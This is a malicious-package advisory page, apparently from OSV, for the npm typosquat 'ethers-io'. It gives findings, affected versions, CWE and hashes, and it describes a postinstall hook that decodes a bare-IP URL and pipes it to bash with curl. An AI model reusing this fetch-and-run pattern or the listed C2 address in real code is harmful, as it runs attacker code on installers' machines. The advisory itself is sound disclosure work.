MAL-2026-3708

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ethers-io/MAL-2026-3708.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-3708

Published

2026-05-13T12:01:08Z

Modified

2026-05-15T07:51:34.899337Z

Summary

Malicious code in ethers-io (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (098acd1dccfed8bcaea9f56206745eef7c9e4cd368599ba23f762a84c86bbc14)

The package's package.json declares a postinstall script that base64-decodes a hidden URL (http://8.217.75.147:3000/payload) and pipes the HTTP response directly to bash via curl -s <url> | bash. On every npm install, arbitrary attacker-controlled shell code is fetched over plain HTTP from a bare IPv4 address and executed on the installer's machine with no TLS, no integrity verification, and fully mutable content. Multiple independent block signals stack: obfuscated URL in a lifecycle hook, curl-pipe-bash, bare-IP plaintext C2, and purpose mismatch with the package's stated function. The package name ethers-io and its stated purpose as "I/O utilities for ethers.js" additionally impersonate the well-known ethers.js ecosystem, with the repository pointing at github.com/ethers-utils/ethers-io rather than the genuine ethers.js organization — a typosquat lure wrapped around the install-time RCE.

Source: ossf-package-analysis (096fee7452967418fa149986d5ef661f3292d844524b58d3c3ca2b2e1b8cffc0)

The OpenSSF Package Analysis project identified 'ethers-io' @ 2.0.0 (npm) as malicious.

It is considered malicious because:

The package executes one or more commands associated with malicious behavior.

Database specific

{
    "malicious-packages-origins": [
        {
            "versions": [
                "2.0.0"
            ],
            "modified_time": "2026-05-13T12:01:08Z",
            "sha256": "096fee7452967418fa149986d5ef661f3292d844524b58d3c3ca2b2e1b8cffc0",
            "source": "ossf-package-analysis",
            "import_time": "2026-05-13T21:58:24.739660541Z"
        },
        {
            "versions": [
                "1.0.0"
            ],
            "modified_time": "2026-05-13T12:01:28Z",
            "sha256": "53670603313bd7a44e508b5eae7a10e2aa77aff4ebe93bb7f37cfa14ffac16e4",
            "source": "ossf-package-analysis",
            "import_time": "2026-05-13T21:58:24.632215328Z"
        },
        {
            "versions": [
                "2.0.0"
            ],
            "modified_time": "2026-05-14T19:25:08Z",
            "sha256": "098acd1dccfed8bcaea9f56206745eef7c9e4cd368599ba23f762a84c86bbc14",
            "id": "IN-MAL-2026-002691",
            "source": "amazon-inspector",
            "import_time": "2026-05-15T07:37:16.778530994Z"
        },
        {
            "versions": [
                "2.0.0"
            ],
            "modified_time": "2026-05-15T03:16:46Z",
            "sha256": "374ad9e5565581a12e9a891c5fffd853d7d6f548261693d05d2fe40a15001ef4",
            "id": "IN-MAL-2026-002815",
            "source": "amazon-inspector",
            "import_time": "2026-05-15T07:37:20.673900921Z"
        },
        {
            "versions": [
                "1.0.0"
            ],
            "modified_time": "2026-05-14T19:25:07Z",
            "sha256": "5c9fe094b4d627b53e4f88fb92a2fbee76337088f6f615c7fdc6ebe95a268a34",
            "id": "IN-MAL-2026-002690",
            "source": "amazon-inspector",
            "import_time": "2026-05-15T07:37:16.723479836Z"
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com
- OpenSSF: Package Analysis - FINDER
- - https://github.com/ossf/package-analysis
  - https://openssf.slack.com/channels/package_analysis

Affected packages

npm / ethers-io

Package

Name: ethers-io; View open source insights on deps.dev
Purl: pkg:npm/ethers-io

Affected ranges

Affected versions

1.*

1.0.0

2.*

2.0.0

Database specific

cwes

[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]

indicators

{
    "package_integrity": [
        {
            "filename": "ethers-io-2.0.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-VnyifUoRFKdpM31skgnvV3Q+BJ99rXEO4Ht2et3LGITpbS3fK4gLsyT33JBmJHMH1STGbCO9GzexGOvDXFhBxQ==",
                "sha1": "a5c87e94ece6c12d7f1fe1e1e5d89a4e736bcd7f"
            }
        }
    ],
    "evidence_files": [
        {
            "path": "package.json",
            "tlsh": "18016651d9242aa32acc1fd46d4e208ab2365c0b5c54bc24b397880e4b5e2ef02fb68d",
            "sha256": "0b6caae1378a89a996fe7e1620494a2475bce12bcdfb8848d6ca9e7ecdc3ef72"
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ethers-io/MAL-2026-3708.json"